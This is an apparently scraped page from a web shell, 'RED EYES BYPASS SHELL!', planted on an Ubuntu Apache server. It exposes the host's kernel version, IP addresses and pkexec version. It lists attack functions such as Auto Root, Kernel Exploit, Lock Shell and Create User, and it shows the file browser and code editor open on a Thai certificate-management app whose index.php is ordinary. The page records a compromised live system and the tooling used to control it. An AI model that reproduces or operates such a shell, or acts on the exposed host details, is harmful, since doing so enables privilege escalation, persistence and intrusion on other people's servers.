Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
mpdf /
view_from7 /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
add.php
3.44
KB
-rwxr-xr-x
edit.php
3.81
KB
-rwxr-xr-x
from7.pdf
434.03
KB
-rwxr-xr-x
index.php
5.03
KB
-rwxr-xr-x
pdfpage1.php
640
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include("../layout/header.html"); ?> <?php include("../layout/slide-bar.php"); ?> <main id="main" class="main"> <div class="pagetitle"> <h1>เกียรติบัตร</h1> <nav> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">หน้าแรก</a></li> <li class="breadcrumb-item active">เกียรติบัตร</li> </ol> </nav> </div><!-- End Page Title --> <!-- Content --> <section class="section"> <div class="card"> <div class="card-body"> <h5 class="card-title"> ตาราง <span>| เกียรติบัตร</span> <a href="/view_from7/add.php" role="button" class="" id="btnAdd" style="float: right; font-size: 25px; " data-bs-toggle="tooltip" data-bs-placement="top" title="เพิ่มข้อมูล" ><i class="bi bi-folder-plus"></i></a> </h5> <table class="table table-striped table-hover" id="dataTable"> <thead> <tr> <th scope="col" class="text-center" width="10%">ลำดับ</th> <th scope="col" class="text-center" width="20%">เลขรัน</th> <th scope="col" class="text-center" width="50%">ชื่อ - สกุล</th> <th scope="col" class="text-center" width="10%">PDF</th> <th scope="col" class="text-center" width="10%">ลบข้อมูล</th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </section> </main><!-- End #main --> <script> $(document).ready(function(){ getData(); function getData(){ $.ajax({ headers: {'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')}, url: "../function_from7/selectlistdata.php", type: "POST", success: function( response ) { let dataResult = JSON.parse(response); if(dataResult.result==true){ if(dataResult.data.length > 0){ let html = ''; let i = 1; $.each(dataResult.data, function( index, value ) { html += '<tr>'; html += ' <td scope="row" class="text-center"><a href="edit.php?id='+value.id+'">'+i+'</a></td>'; html += ' <td scope="row" class="text-center"><a href="edit.php?id='+value.id+'">'+value.ordering+' / 2556</a></td>'; html += ' <td ><a href="edit.php?id='+value.id+'">'+value.fullname+'</a></td>'; html += ' <td class="text-center"><a target="_blank" href="../function_from7/exportpdf.php?id='+value.id+'" role="button" class="btn btn-warning"><i class="bi bi-file-earmark-pdf"></i> </a></td>'; html += ' <td class="text-center"><a href="javascript:void(0)" role="button" onclick="deleteData('+value.id+')" class="btn btn-danger"><i class="bi bi-trash3-fill"></i> </a></td>'; html += '</tr>'; i++; }); $('#dataTable tbody').append(html); }else{ $('#dataTable').append('<td colspan="6" class="text-center" style="padding: 40px 0; ">ไม่พบข้อมูล</td>'); } }else{ $('#dataTable').append('<td colspan="6" class="text-center" style="padding: 40px 0; ">ไม่พบข้อมูล</td>'); } } }); } }); function deleteData(id){ Swal.fire({ title: 'ลบข้อมูล', icon: 'warning', html: 'ต้องการลบข้อมูลหรือไม่', showCancelButton: false, showDenyButton: true, confirmButtonText: 'ใช่', denyButtonText: 'ไม่ใช่', }).then((result) => { if (result.isConfirmed) { $.ajax({ headers: {'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')}, url: '../function_from7/deletedata.php', type: "POST", data: { id: id }, success: function( response ) { var dataResult = JSON.parse(response); if(dataResult.result==true){ Swal.fire({ title: 'ลบข้อมูลสำเร็จ', icon: 'success', html: 'ข้อมูลของคุณถูกลบเรียบร้อยแล้ว', showDenyButton: false, showCancelButton: false, confirmButtonText: 'ตกลง', }).then((result) => { window.location = "index.php"; }) } } }); } else if (result.isDenied) { } }) } </script> <?php include("../layout/footer.html"); ?>
Close